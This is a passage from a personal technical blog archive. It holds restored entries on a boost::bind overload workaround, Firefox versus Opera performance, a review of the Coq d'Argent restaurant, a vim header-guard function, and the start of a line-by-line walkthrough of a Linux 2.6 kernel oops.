Category Archives: Uncategorized

boost::bind and <unresolved overloaded function type>

Note: This entry has been restored from old archives.

I had a hard time Googling a solution to this particular woe. Alas the exact string “unresolved overloaded function type” doesn’t give anything useful with “boost::bind” and “boost:mem_fn“. This is the typical sort error message from g++:

foo.cpp:18: error: no matching function for call to
    'bind(<unresolved overloaded function type>,
        const boost::reference_wrapper<FooMaster>, boost::arg<1> (&)())'

I’ve generated this using a rather contrived example based on the use pattern that was causing my woe:

#include <iostream>
#include <boost/bind.hpp>

class FooMaster {
public:
    void foo(std::string &s) {
        std::cout << "foo(s=" << s << ")" << std::endl;
    }

    void foo(int x) {
        std::cout << "foo(x=" << x << ")" << std::endl;
    }
};  
    
int main(int argc, char **argv) {
    FooMaster fm;
    boost::bind(&FooMaster::foo, boost::ref(fm), _1)(10);
    return 0;
}

The problem is obvious of course, it is exactly as the compiler is telling you. Mr compiler has no idea which “foo” you’re talking about. “But Mr Compiler, it is obvious!” You say. “I’m not passing it a bloody string!” Sometimes you just have to understand that Mr Compiler isn’t you and needs a little hand-holding.

The issue clearly boils down to FooMaster having two methods that match &FooMaster::foo. This signature, used to instantiate the bind template, doesn’t take into account the arguments, so which foo are we taling about?! Alas, as obvious as the problem was I didn’t find the solution so obvious. I just don’t cut it as a C++ guy sometimes. I’d given up on the problem in fact, but then I stumbled on a solution while looking into some other problem I had. It was one of those “oh, duh!” moments really, I was looking at some code that assigned a member function pointer. The type specification for such a thing includes the argument types! So here’s a modified main that uses one extra step in order to explain what we want to the compiler:

int main(int argc, char **argv) {
    FooMaster fm;
    // Create a variable of the desired function signature type and assign
    // using desired member function.  This will resolve the correct
    // function thanks to the signature including the argument types.
    void (FooMaster::*fn)(int) = &FooMaster::foo;
    // Now pass the function variable to the template method so that it knows
    // exactly which function we mean.
    boost::bind(fn, boost::ref(fm), _1)(10);
    return 0;
}

All you have to do is give Mr Compiler a little bit of a helping hand…

Joy!

Firefox Slowness Redux

Note: This entry has been restored from old archives.

While I did get around to my one-extention-at-a-time testing of Firefox slowness I still haven’t got around to writing more about it. My, rough, observations are the following:

  1. The longer Firefox is running the slower everything gets. As much as I’d love to turn my computer off every night and start afresh every morning the fact is that the best I can do really is put it into suspend, without wasting time every morning (I work at home and maintain a lot of state on my computer.) Another solution would be to stop-start firefox every now and then since it’ll reload my last set of open tabs/windows on starting, I really shouldn’t have to do that though, and it leads to point 2…
  2. More tabs seems to mean more slowness. I tend to be tab-happy, like my 20-desktop(+tabs) spaces of state I find keeping stuff open in the browser to be simpler than worrying about “saving tabsets” and bookmarking everything (and trying to work out one end of the “history” from the other is just not going to work.) To this end I tend to have 2 or three browser windows open at a time with up to three rows of tabs in each. The slowness isn’t Firefox hitting swap so must be something else (Firefox memory use seems to grow linearly with number of tabs open, fair enough I guess since memory is cheap these days.) Maybe a plugin or extension, I haven’t tried the incremental-plugin/extension-addition + tab-growth experiment.
  3. The “SwitchProxy Tool” extension does seem to cause slowness. I’m confounded as to why it should be so!
  4. The “Google Browser Sync” extension also causes slowness. Again, I have no idea why, but it does a pretty complicated job.

That’s all I have to report. And AFAIC “problem solved!” “How so?!” You ask? Simple: I’ve mostly stopped using Firefox. Over the last few weeks I’ve been making a gradual switch to Opera. Oh no! It’s closed-source evilware! shrug It is:

  1. Faster (oh, so much faster!), more responsive when I have 50 tabs open in three windows.
  2. No longer encumbered with that annoying ad panel.
  3. Now equipped (in the current beta) with native browser-sync functionality. This is nice since Google Browser Sync has become, for me, the most important Firefox feature. That said, I don’t know how “trusted” the Opera browser sync is and it certainly doesn’t seem to be as comprehensive as the Google offering. I expect Opera sync will be expanded in time.
  4. No more of a memory hog than Firefox (as far as I can see, but I haven’t tested this exhaustively.)
  5. Binary packaged for every distro I use and there’s an apt repository (though without Ubuntu dists, my sources.list line on Ubuntu gutsy is for Debian testing.)

On the downsides:

  1. Has occasional problems with Flash, which require a browser restart but luckily Opera comes back up with all my windows and tabs rather quickly. Yes, in an ideal world there’d be no flash, wank, wank. Flash is a “fact of life” as far as the web goes these days, and IMO it gives us some useful things that would XHTML/CSS can’t. This particular problem is my most pressing issue with Opera at the moment.
  2. No less of a memory hog than Firefox. This is based on occasional glances at top while running both, not any proper testing!
  3. Much less of a CPU hog than Firefox but still pretty bad at idle sometimes. However this is mostly the fault of websites to some degree, it just seems that Opera keeps a tighter hold on not letting a site’s javascript get out of hand. For example, having smh.com.au open in Firefox really bogs it down, while Opera remains responsive (albeit at a constant ~10% CPU usage on my desktop.) It should be noted that the smh.com.au site runs some particularly disgusting javascript.
  4. Hitting sites that “don’t work in Opera” is more common than “don’t work in Firefox”, but the Web’s become pretty good in this regard these days so this is fairly rare.

It should be noted that I’m using a beta version of Opera (on Ubuntu Gutsy.)

There are things I haven’t tried or worked out with Opera yet. Namely:

  1. What’s on offer as far as equivalents to the Firebug and Web Developer Firefox extensions. I haven’t had to do any HTML/CSS debugging for a while.
  2. AdBlock Plus equivalent? I think there might be one out there, but I have to admit I’m not hunting since I’ve kind of fallen out of love with auto-updated ad blocking, it was blocking things I wanted to see sometimes. Opera does have a “content block” feature and I use it to block out particularly bad ads and ad-iframes (anything I see that is large, or overtly bright, or animated.)

I haven’t spent much time looking into equivalent Opera functionality as I have everything I need for day-to-day browsing “out of the box.” However, I just found “Opera equivalents to Firefox extensions” and “Opera equivalents to Firefox extensions II” which look like a pretty good starting point!

In conclusion: I’m converted to Opera. It has it’s downsides, but so does Firefox and my feeling at the moment is that Firefox is more annoying than Opera.

Coq d’Argent

Note: This entry has been restored from old archives.

It was that time again, time to go out to a great restaurant as a “make up” dinner because I’d had to bugger off somewhere and leave Kat alone a for a week. Such creatures become unhappy when left to fend for themselves for too long. Exactly where to eat is always the problem, there are so many interesting restaurants in London. I juggled around a few names I remembered and tried to find somewhere that definitely had Squirrel on the menu at the moment, but no luck there. So, something different at least? We normally do very Italian style food so how about French? A couple of names came to mind and on the back of seeing a lot of good reviews it was Coq d’Argent we chose.

Coq d’Argent can be found on the roof of N° 1 Poultry, convenient for “City” folk (like Kat, who works only a 2 minute wander down the road.) Poultry/Coq is just the first witty pun. “Argent”, it seems, can be taken in two meanings: one being “money” (we’re in the banking district after all), and the other, from heraldry, “silver” (pretty much the same link to the City there I guess). So, the “Silver Rooster” on N° 1 Poultry in the financial district. Ho ho. Anyway, enough randomness, we’re in this for the food.

Entrée

Coq is a very French restaurant, complete with all the stereotypical French dishes. This left me with a bit of a conundrum when it can to the entrée, only two?! So we picked three. Kat had the cuisses de grenouille, which is frog’s legs to you and me. While I ordered the terrine de foie gras au jambon fumé, which doesn’t need translation I think! Then to share we had another dish that really speaks for its self: douzaine d’escargots.

Frogs legs, foie gras, and snails— could we try any harder?

Timbale de cuisses de grenouille au vermouth, Avruga caviar et crème d’épinards.
(Frog legs and vermouth timbale with spinach cream and Avruga caviar.)
The timbale came with an escort of three little legs, nuggets of meat in a very light crispy batter complete with little bones sticking out. The legs were succulent and, I guess, a little like dark-meat on chicken. The timbale was delicately flavoured, so as to not overwhelm the leg meat it contained. The spinach cream (or: creamed spinach) and caviar topped off the whole dish well. Avruga caviar is actually a fancy name for a caviar made with herring roe, and my assessment of it was that it was rather good! (However have a look at that link to learn about the true nature of this “caviar”.)

Terrine de foie gras au jambon fumé, poire aigre-doux, purée de pruneaux.
(Foie gras and smoked ham terrine, pickled pears, prune compote and sherry vinegar caramel.)
Ah, foie gras, I don’t know how much the goose suffered but it was all worth it. A good rich terrine this and a reasonably sized slice (for this day and age.) The “pickled pears” barely rated a mention, coming in about 10 pieces about 3mm to a side. Personally, I’d have preferred a few neat slices. That said, they’re really just there to lead some sharpness to cut the thick richosity of the terrine and the prune compote came in a good dollop alongside a drizzle of the “vinegar caramel” (think darkened sugar syrup) that lent it’s own edge. I enjoyed every mouthful, even the ones Kat ate.

Douzaine d’escargots de Bourgogne au beurre d’ail et tomates.
(Twelve snails baked in garlic and tomato butter.)
Straight out of the French language textbook! (I studied French for three years in school, but somehow didn’t learn a thing.) There’s always the snail horror stories you hear: “chewy little lumps of garlic flavoured rubber.” I’m glad to say we didn’t have such an experience, the dark little bodies of our snails, tucked delicately into their shells, were succulent and melt-in-the mouth tender. I’m not sure what to compare them to actually. And you can’t go wrong with garlicy butter, especially when there’s bread nearby.

Main Course

That wraps up the first course, and what a beginning! I’d had some difficulty choosing my main course and ordering three really wasn’t going to be an option. Wanting something with a bit of meat to it I went for the filet de sanglier, wild boar. Kat eyed the fish for a while before actually choosing agneau rôti à la provençale which was actually agneau de pré-salé, or salt-marsh lamb. This, despite the “salt” and related seaside environment, really isn’t quite fish. Right after the entrée I popped along to the bathroom and found the mains already on the table when I returned! A tad too speedy for my tastes I have to say, it must have been less than ten minutes between clearing firsts and laying out the seconds. Agneau rôti à la provençale, jus au romarin.
(Salt marsh lamb with mini ratatouille, soft mash, pesto, anchovy fritter, black olives and rosemary jus.)
Kat’s main was a sizable serving, with three decent pieces of lamb (including a cutlet). The presentation was an amusing construction whereby an encircling wall of mash, dotted with olives and pesto, had been built around the core constituents of the dish and filled with a shallow pool of jus. That was the pinnacle of presentation for the evening, though every dish came with a strong dose of the art. (Something I have only a marginal respect for.) I found the anchovy fritter an unusual and maybe too cheffy device, essentially packaging for a condiment. However, this was a good solid dish and the lamb pink and juicy. This “salt marsh” lamb is talked up a lot but from the little I tasted and from Kat’s words I don’t think we recognised anything really special about this lamb. Don’t get me wrong though, it was very good lamb, I’m just not sure if it was amazingly, wonderfully good. I will have to endeavour to get myself a leg or shoulder of it for a more complete assessment.

Filet de sanglier sauce grand veneur, purée de marron et panais rôti.
(Wild boar fillet wrapped in pancetta with chestnut purée, roasted parsnip and grand veneur sauce.)
Three small medallions of fillet made this a much less substantial meal that Kat’s, but sufficient. Being served with one tiny, lonely baked onion (it’s not listed, so it’s a bonus I guess), and a couple of skinny sticks of parsnip certainly doesn’t bulk it out enough for those who measure enjoyment by volume! A good thing I fit less in and have a smaller appetite these days then! The chestnut purée was an excellent wetting agent for the plate, not something I’ve had before but something I’ve got to add to my repertoire. Now the sauce is a bit of an enigma, I tasted it and immediately recognised chocolate and Kat agrees. If I’d thought to review the menu and seen “grand veneur” I’d have asked about it, but Kat said she saw mention of chocolate on the menu and I left it at that. The problem is that the online menu (which I used as reference for the names in this entry) says it is a grand veneur sauce. This is, essentially, a rather complicated stock reduction (a poivrade) thickened with blood and finished with redcurrant jelly and cream. There was certainly no hint of anything cream-like in the sauce with my meal! I suspect the answer to this puzzle is that the menu of the night was slightly different to what they have online, which is a fairly common occurrence (restaurant menus tend to be “live” documents.)

OK, I’ve written far too much about this dish now and not even approached the point yet… how was it? Good, the possibly-chocolate sauce and chestnut purée were a highlight and I’ve got to keep them in mind when I tackle game meats in future. But not brilliant, the “wild boar” lacked the sort of strong flavour I hoped for and what flavour it had was hard to find behind the flavour absorbed from the pancetta. Aside from my persnicketiness in regard to flavours the dish added up to something enjoyable, the boar tender and the sauces unusual and flavourful (maybe a little sweet, there I go again.)

Along with our mains we had a small rocket and parmesan salad, dressed with a good balsamico and, refershingly, lemon juice. The acidity in the salad worked well complimenting the flavours in my main.

Dessert

There was certainly room for dessert! Given the non-overzealous serving sizes, the small amount of bread (a good thing), and our choice to order only a very small salad as an extra. Kat went straight for the Catalan crème brûlée, which was an excellent and very rich rendition of this all time favourite. I debated whether or not to have one with poached rhubarb or something much richer and chocolaty. I don’t normally go for chocolate desserts so decided to give it a go for a change and had the “Warm bitter chocolate and marmalade sabayon tart with orange ice sorbet.” It beat Kat’s dessert on richness, twice over at least! The tart filling was akin to a warm version of my richest chocolate mousse and the crust thin and crumbly, this balanced very well with the frigid tang of the sorbet. If anything the tart could have been just a little smaller.

The Rest

I didn’t have any wine with this meal, sticking to just water. I was glad to note that their still water was UK sourced and not imported from some ridiculous location. It was also supposedly “carbon neutral”, however they work that out. I almost always stick to tap water these days, water from Fiji? People are idiots. Anyway, the water was good and a little less uncomfortable.

Kat had a glass of Chianti, it was very good, you’d hope so at £11.50 for 125ml.

We dared espresso, and that was nothing special. I don’t really like espresso in France (based only on experience in Provence and Corsica) but it is very consistent and the coffee in Coq was authentic in that sense. Certainly better than the “English standard”, but then so is cow manure. (One day I might get off my old espresso high-horse, or maybe I’ll just move to Italy and shut up.)

The End

The service was great, not in-your-face as is all too common in the fancier restaurants. Pretty much a case of being there only when you want it but also always when you want it. In a rare act I actually rounded up the bill a bit on top of the auto-service-charge of 12.5%.

In the end the bill was £132.75, including the 12.5% “discretionary service charge”. That includes all the dishes mentioned above with £11.50 for a glass of wine, £3.75 for 750ml of water, and £5.00 for two espressos. Now that I scan over the bill I have to end the evening on a bit of a bum note, they charged me for a very random thing I never had! £6.75 for a “Chivas Regal”, at that price it can’t have been a very good one anyway so I’m glad I didn’t have it. How the bloody hell that ended up on there I don’t know, oh well maybe I’ll learn the lesson to check bills more carefully in future. Bit of a bummer, but £6.75 isn’t worth too much upset and I have to accept part fault for not checking the bill as I should. (And I extra-tipped these incompetents! That’s totally unfair, from experience I know how easily these mistakes can creep in and don’t go in for the conspiracy theories.)

Overall, in our experience of “known” London restaurants, we’re rating this as our second-best meal to-date. (FYI, third is “The Providores”, which I never wrote about, and first is the “Neal Street Restaurant,” now sadly no more.) We’re likely to try Coq again in the summer, since there’s a huge and well presented outdoor space on top of the building (the space inside the circle and the wings on both sized of the orange roof in this zoomed-in version of the map link above.) It looks like a beautiful spot for a classy summer lunch or dinner.

Oh, we booked through the “D&D London” website again, worked out fine.

Vim Header Guard Trick

Note: This entry has been restored from old archives.

Quite some time ago a friend of mine at work supplied us with a magical vim binding that generated safe header guards. (And copyright/licence/doxygen preamble too!) The idea is that it automatically inserts the matching (#ifndef, #define, #endif) triplet and uses a guard that incorporates the file name and a suitably long random number. (The random number is what makes it “safe”, for example what if you have a “UTIL_H” but another library you’re using also has a “UTIL_H“?)

Today I went to use the trusty old insert-guard key-binding and I see: “shell returned 127“. The problem was a simple one, the vim binding called on a script written by yet another colleague. I had copied my usual .vimrc over but not the required script so the guard failed. Since I’m easily distracted I decided to work out a way to generate the guards that wouldn’t do this to me again, rather than just scp the script onto the system! I ended up with this:

" function to insert a C/C++ header file guard
function! s:InsertGuard()
  let randlen = 7
  let randnum = system("xxd -c " . randlen * 2 . " -l " . randlen . " -p /dev/urandom")
  let randnum = strpart(randnum, 0, randlen * 2)
  let fname = expand("%")
  let lastslash = strridx(fname, "/")
  if lastslash >= 0
    let fname = strpart(fname, lastslash+1)
  endif
  let fname = substitute(fname, "[^a-zA-Z0-9]", "_", "g")
  let randid = toupper(fname . "_" . randnum)
  exec 'norm O#ifndef ' . randid
  exec 'norm o#define ' . randid
  let origin = getpos('.')
  exec '$norm o#endif /* ' . randid . ' */'
  norm o
  -norm O
  call setpos('.', origin)
  norm w
endfunction

" keymap Ctrl-g to the InsertGuard function
map <silent> <C-g> :call <SID>InsertGuard()<CR>

It is still dependent on an external command, but if vim is installed then xxd is pretty likely to be around! (Since xxd is part of the vim toolset.) I wonder if it could be shorter? I didn’t find an obvious equivalent to “basename” in vim, I suspect there might be an alternative variable to ‘%‘ that gives what I want.

An example of what it generates when you’re editing “src/util.h” and hit Ctrl-h:

#ifndef UTIL_H_668A545328A5CC
#define UTIL_H_668A545328A5CC

<existing file content>

#endif /* UTIL_H_668A545328A5CC */

Grokking Oopses

Note: This entry has been restored from old archives.

Introduction

Man it was hard to find information on debugging 2.6 kernel issues, maybe my Google skills need honing. Recently I was parachuted into a customer site on a support-or-die mission. The problem: kernel-space. My problem: not much kernel-space experience. A week of little sleep, much reading, and some learning. In the end the problem was rooted out and the crack team of kernel monkeys back at base blew it out of the water. Hooray!

This is the first in a trilogy of entries I intend to write. This one discusses a specific example of an “Oops” in detail, giving a line-by-line description of everything the oops tells you. Well, almost everything, some details go too deep to cover in something this introductory… to drill all the way down could take a whole textbook.

The second entry goes into relating the oops to the original code, I might call it “tracing assembly”. The third entry will delve into a session of debugging with ‘kdb’.

Now the first two entries will certainly happen as almost all the material was written during my work trip. (Joyful hours of trains, flights, and just plain waiting at stations and airports.) I won’t make any promises about the ‘kdb’ entry though, since I’ve written nothing for it and would need to spend quite a bit of time generating examples and traces.

Important items of note:

  • An IA32/i386 architecture/kernel is assumed, the oops code is platform dependant.
  • The oops examined here comes from a 2.6.16 kernel.
  • Sometimes file paths are given, these are relative to the root of a Linux 2.6.16 source tree.
  • This entry deals with a specific oops for a specific error case and doesn’t discuss much beyond the specific example.
  • There’s no guarantee, as far as I know, that the oops format won’t change at some time.

Finally, a disclaimer: I am not a kernel developer. In fact I learnt a couple of new things just writing these two entries. No doubt there are important facts I’ve missed or not rated highly enough. Maybe it is even possible that I’ve got something plain wrong (if so please correct me via the comments or email).

Oops!

Let us start where these things usually start, a kernel oops:

kernel: Unable to handle kernel paging request at virtual address 68230a7d
kernel: printing eip:
kernel: c0143742
kernel: *pde = 00000000
kernel: Oops: 0000 [#1]
kernel: SMP 
kernel: Modules linked in: monkey_pkt_eater nfnetlink_queue xt_condition
    iptable_ips edd ide_cd ip_nat_ftp ip_conntrack_ftp ipt_REDIRECT xt_tcpudp
    ipt_addrtype ebtable_nat ebtables ip_nat_mms ip_nat_pptp ip_nat_irc
    iptable_nat ip_conntrack_mms ip_conntrack_pptp ip_conntrack_irc af_packet
    ipt_logmark ipt_CONFIRMED ipt_confirmed ipt_owner ipt_REJECT sr_mod cdrom
    usb_storage evdev microcode parport_pc ppdev parport xt_state xt_NOTRACK
    iptable_raw iptable_filter ip_conntrack_netlink ip_nat ipt_LOG ip_conntrack
    ip_tables x_tables nfnetlink_log nfnetlink monkey e1000 capability
    commoncap loop sg ahci libata sd_mod scsi_mod
kernel: CPU:    0
kernel: EIP:    0060:[<c0143742>]    Tainted: PF     VLI
kernel: EFLAGS: 00210202   (2.6.16.43-54.5-smp #1) 
kernel: EIP is at put_page+0x2/0x40
kernel: eax: 68230a7d   ebx: 00000001   ecx: f1057680   edx: 68230a7d
kernel: esi: f6fe7600   edi: fe089b98   ebp: f64d3c14   esp: f64d3bbc
kernel: ds: 007b   es: 007b   ss: 0068
kernel: Process snort_inline (pid: 6298, threadinfo=f64d2000 task=dff3fa70)
kernel: Stack: <0>c02a8b4a f6fe7600 f1057020 c02a88d8 000004cd f9de0fdd c7af5000 f7802b60 
kernel: 0000c7af fe73e860 f64d3c48 f64d3c48 e7e19834 f64d3c34 f5b54cc0 00000000 
kernel: 00000001 c02c7adf 00200282 d94bd4cc f64d3c48 f4429a40 f64d3c40 f9dd912a 
kernel: Call Trace:
kernel: [<c02a8b4a>] skb_release_data+0x8a/0xa0
kernel: [<c02a88d8>] kfree_skbmem+0x8/0x80
kernel: [<f9de0fdd>] mkyDestroyPacket+0x9d/0x260 [monkey_pkt_eater]
kernel: [<c02c7adf>] ip_local_deliver_finish+0xef/0x270
kernel: [<f9dd912a>] mkyIpqPostHandler+0xda/0x140 [monkey_pkt_eater]
kernel: [<c02c79f0>] ip_local_deliver_finish+0x0/0x270
kernel: [<f8e9e182>] find_dequeue_entry+0x82/0x90 [nfnetlink_queue]
kernel: [<f8e9e1ab>] issue_verdict+0x1b/0x50 [nfnetlink_queue]
kernel: [<f8e9f5af>] nfqnl_recv_verdict+0x1ff/0x330 [nfnetlink_queue]
kernel: [<c0308730>] schedule+0x350/0xdd0
kernel: [<f887940e>] nfnetlink_rcv_msg+0x16e/0x200 [nfnetlink]
kernel: [<f8879542>] nfnetlink_rcv+0xa2/0x169 [nfnetlink]
kernel: [<c02beecd>] netlink_unicast+0x16d/0x250
kernel: [<c02bf462>] netlink_data_ready+0x12/0x50
kernel: [<c02be2d1>] netlink_sendskb+0x21/0x40
kernel: [<c02bfacd>] netlink_sendmsg+0x27d/0x320
kernel: [<c0116c88>] __wake_up+0x38/0x50
kernel: [<c02a2b2e>] sock_sendmsg+0xae/0xe0
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<f90caa7f>] monkey_chan_queue_append+0x15f/0x170 [monkey]
kernel: [<c02a9e4a>] verify_iovec+0x2a/0x90
kernel: [<c02a306d>] sys_sendmsg+0x15d/0x270
kernel: [<c02a3f86>] sys_recvfrom+0x116/0x140
kernel: [<f90557c0>] e1000_clean_rx_irq+0x0/0x3d0 [e1000]
kernel: [<f9053b0e>] e1000_clean+0x53e/0x780 [e1000]
kernel: [<f90c7780>] mkyGetState+0x20/0x30 [monkey]
kernel: [<f9ddbc90>] packet_writer+0x2e0/0xd50 [monkey_pkt_eater]
kernel: [<c02a453f>] sys_socketcall+0x24f/0x280
kernel: [<c013a5b0>] __do_IRQ+0xc0/0x110
kernel: [<c0102d3f>] sysenter_past_esp+0x54/0x75
kernel: Code: c0 8b 01 01 c2 83 fa 10 89 11 7f 05 83 fa f0 7d 0d f0 01 15 fc 8f
    40 c0 c7 01 00 00 00 00 c3 8d 76 00 8d bc 27 00 00 00 00 89 c2 <8b> 00 f6
    c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0 

(This oops has had some timestamp details removed and has been wrapped for neatness. Also, some “proprietary symbols” have been renamed, let us just say: beware the monkey.)

Tackling the oops

Let me first say: Thanks to the Internet containing cruft from all ages you’ll find many references to ksymoops when researching kernel oopses. Stop now! Maybe add a “-ksymoops” to your search query, though this may remove several good links. It really is a battle against accumulated information. The ksymoops tool was useful for dealing with Linux 2.4 oopses, but in 2.6 it’s work is done at oops-time and ksymoops is useless. If you’re dealing with 2.6 forget about ksymoops.

On with the oops. It tells us quite a lot about what was going on when the it occurred, we have the stack, the call path, the content of registers, and more. On inspection much of this is pretty straight forward to someone familiar with Linux, C programming, and Intel CPUs and assembly (be aware of GAS). It’s probably very hard going for someone who hasn’t done any work at that sort of level, but difficulty is just a good opportunity to learn! Right? However, like me, you don’t need to be a hard-core kernel hacker (I’m not even soft-core, I’d barely earn a PG rating) to get an idea of what’s going on.

Line by line

kernel: Unable to handle kernel paging request at virtual address 68230a7d

The core problem, and an oft-seen one, think of this as the “segfault” of the kernel. In actual fact both userspace nd kernelspace memory access violations come from the same place (MMU) and are handled by the same code. Generation of the oops text starting with this line has it’s origins in do_page_fault in the arch/i386/mm/fault.c code file. Think of that path as “i386 memory manager faults”. (“faults” covers a bunch of conditions, not just access violations.)

In short: something in the kernel has tried to use an address that doesn’t work, and that address was: 0x68230a7d.

kernel: printing eip:
kernel: c0143742
kernel: *pde = 00000000

Eip! It sounds like a small rodent’s cry of distress. It’s actually the “Extended Instruction Pointer”, which is the CPU register containing the address in memory of the instruction being executed. Thinking back to computer architecture classes you might be more familiar with this as the “Program Counter”. This tells us that at the time of the invalid paging request the instruction at address 0xc0143742 was being executed. A most useful bit of information that we’ll return to several times.

The “PDE” is the “Page Directory Entry”, and I’m not going to pursue that further. Try this article by Robert Collins, published in DDJ back in ’96, for more information: Understanding 4M Page Size Extensions on the Pentium Processor.

There’s a seriously large amount of information behind this that is worth reading up on. For starters try Google mixing “Linux Kernel” with a variety of things like “virtual memory”, “paging”, “mmu”, … From my bookshelf I’d recommend Chapter 2 of Understanding the Linux Kernel. That book is fairly bent towards Intel, I don’t have a book that covers deeper Intel specifics and can only recommend you make use of Google.

kernel: Oops: 0000 [#1]
kernel: SMP 

Now we’ve jumped to output generated by the die function in arch/i386/kernel/traps.c.

The first number is actually the error_code value passed to do_page_fault printed in hex. The interpretation for this is:

 *  bit 0 == 0 means no page found, 1 means protection fault
 *  bit 1 == 0 means read, 1 means write
 *  bit 2 == 0 means kernel, 1 means user-mode

So 0000 means “no page found” on “read” in “kernel” mode. This checks out with what we already know, consistency is good.

The number in the square brackets is the oops count. It is the number of times this die function has been called since boot, counting from 1. Usually you only want to worry about the first oops that you find. Everything after that point could be a side-effect of earlier kernel badness. If you’re working past the first oops then anything I have written here will be old news to you.

Yeah, and it is an SMP kernel. Other strings that may appear here are PREEMPT, and DEBUG_PAGEALLOC. After this the somewhat mis-named show_registers function found in arch/i386/kernel/traps.c is called and the rest of the oops text is generated in or below this call.

kernel: Modules linked in: monkey_pkt_eater nfnetlink_queue xt_condition
    ...

This output is generated by a call to print_modules (kernel/modules.c) by show_registers. Usually one of these will be the culprit for your problem, module code tends to be less stable than core kernel code, especially proprietary modules!

kernel: CPU:    0

This message is coming from CPU 0. Obvious enough?

kernel: EIP:    0060:[<c0143742>]    Tainted: PF     VLI

Eip! Again. The value 0060 comes from the CS register, let’s ignore it. (Sorry!) After that we have the EIP address 0xc0143742 shown again. Now “Tainted“, sounds nasty doesn’t it? There are six single-char codes here, and they’re generated by the print_tainted function in kernel/panic.c. The codes represent a bunch of undesirable, yet legal, things that might have been done to the kernel. The first code either ‘P‘ or ‘G‘, if the former then a non-GPL module has been loaded (as is the case here). If you have a ‘P‘ then don’t expect much support from kernel.org developers, unless the problem is obviously not related to non-kosher kernel modules. You’ll either want to work out the problem yourself, reproduce the problem without the proprietary module loaded, or get help from the vendor responsible for said module.

I’ll take a short-cut now and rip the comment from print_tainted to give the full list of flags:

 *  'P' - Proprietary module has been loaded.
 *  'F' - Module has been forcibly loaded.
 *  'S' - SMP with CPUs not designed for SMP.
 *  'R' - User forced a module unload.
 *  'M' - Machine had a machine check experience.
 *  'B' - System has hit bad_page.

The alternative character to all except ‘P‘ is a blank space (i.e. flag is unset). In our oops we also have an ‘F‘ because one of the custom modules loaded is missing symbol version information. The ‘F‘ flag can come into the mix for a variety of reasons it seems, the canonical one being that `insmod -f` was used to load it. None of the other “taints” are flagged in my example so I’m not going detail them. (See the bottom of Documentation/oops-tracing.txt for information.)

One last note on “taint”: Once a kernel is tainted it stays tainted. I.e. if you load a propriety module it taints the kernel and the ‘P‘ taint flag remains even if you unload it. You could think of it as an “from here on in all bets are off” state.

After the taint flags we have “VLI” and I don’t have a clue what this signifies. This is hard-coded in the i386 traps.c file, since it isn’t variable within the architecture I’ll dismiss it as unimportant!

kernel: EFLAGS: 00210202   (2.6.16.43-54.5-smp #1) 

This line first gives the CPU’s EFLAGS register, this register stores all the usual flags like “carry” as well as a bunch of less familiar flags (see link for more detail). After the flags, in brackets, is the version string identifying the kernel that generated the oops.

kernel: EIP is at put_page+0x2/0x40

Eip! Yet again, but now with some more useful information. The symbol attached to the code into which EIP is pointing along with EIP’s offset from the symbol (0x02) and the size of the code associated with the symbol (0x40, distance between the put_page symbol and the next marked symbol).

kernel: eax: 68230a7d   ebx: 00000001   ecx: f1057680   edx: 68230a7d
kernel: esi: f6fe7600   edi: fe089b98   ebp: f64d3c14   esp: f64d3bbc
kernel: ds: 007b   es: 007b   ss: 0068

Now we finally get the actual named purpose of the print_registers function: a dump of the content some CPU registers. It’s worth noting at this point that %edx and %eax both contain our dodgey address.

kernel: Process snort_inline (pid: 6298, threadinfo=f64d2000 task=dff3fa70)

Information about the current “process” being run on the CPU including pointers to the process’s thread and task structures. There will always be some process, but it may or may not be directly related to the error that caused the oops. When you’re debugging don’t jump to conclusions without good reason, keep following the trail of the oops.

kernel: Stack: <0>c02a8b4a f6fe7600 f1057020 c02a88d8 000004cd f9de0fdd c7af5000 f7802b60 
kernel: 0000c7af fe73e860 f64d3c48 f64d3c48 e7e19834 f64d3c34 f5b54cc0 00000000 
kernel: 00000001 c02c7adf 00200282 d94bd4cc f64d3c48 f4429a40 f64d3c40 f9dd912a 

The stack. Simply each word starting at %esp (stack pointer) and continuing
to the base of he stack or for kstack_depth_to_print words, a limit
configurable at kernel compile time. Some values in the stack can be related
to the next part of the oops, the “Call Trace“. Essentially, starting with the
at %esp the call chain is traced:

kernel: Call Trace:
kernel: [<c02a8b4a>] skb_release_data+0x8a/0xa0
kernel: [<c02a88d8>] kfree_skbmem+0x8/0x80
kernel: [<f9de0fdd>] mkyDestroyPacket+0x9d/0x260 [monkey_pkt_eater]
kernel: [<c02c7adf>] ip_local_deliver_finish+0xef/0x270
kernel: [<f9dd912a>] mkyIpqPostHandler+0xda/0x140 [monkey_pkt_eater]
kernel: [<c02c79f0>] ip_local_deliver_finish+0x0/0x270
kernel: [<f8e9e182>] find_dequeue_entry+0x82/0x90 [nfnetlink_queue]
kernel: [<f8e9e1ab>] issue_verdict+0x1b/0x50 [nfnetlink_queue]
kernel: [<f8e9f5af>] nfqnl_recv_verdict+0x1ff/0x330 [nfnetlink_queue]
kernel: [<c0308730>] schedule+0x350/0xdd0
kernel: [<f887940e>] nfnetlink_rcv_msg+0x16e/0x200 [nfnetlink]
kernel: [<f8879542>] nfnetlink_rcv+0xa2/0x169 [nfnetlink]
kernel: [<c02beecd>] netlink_unicast+0x16d/0x250
kernel: [<c02bf462>] netlink_data_ready+0x12/0x50
kernel: [<c02be2d1>] netlink_sendskb+0x21/0x40
kernel: [<c02bfacd>] netlink_sendmsg+0x27d/0x320
kernel: [<c0116c88>] __wake_up+0x38/0x50
kernel: [<c02a2b2e>] sock_sendmsg+0xae/0xe0
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<f90caa7f>] monkey_chan_queue_append+0x15f/0x170 [monkey]
kernel: [<c02a9e4a>] verify_iovec+0x2a/0x90
kernel: [<c02a306d>] sys_sendmsg+0x15d/0x270
kernel: [<c02a3f86>] sys_recvfrom+0x116/0x140
kernel: [<f90557c0>] e1000_clean_rx_irq+0x0/0x3d0 [e1000]
kernel: [<f9053b0e>] e1000_clean+0x53e/0x780 [e1000]
kernel: [<f90c7780>] mkyGetState+0x20/0x30 [monkey]
kernel: [<f9ddbc90>] packet_writer+0x2e0/0xd50 [monkey_pkt_eater]
kernel: [<c02a453f>] sys_socketcall+0x24f/0x280
kernel: [<c013a5b0>] __do_IRQ+0xc0/0x110
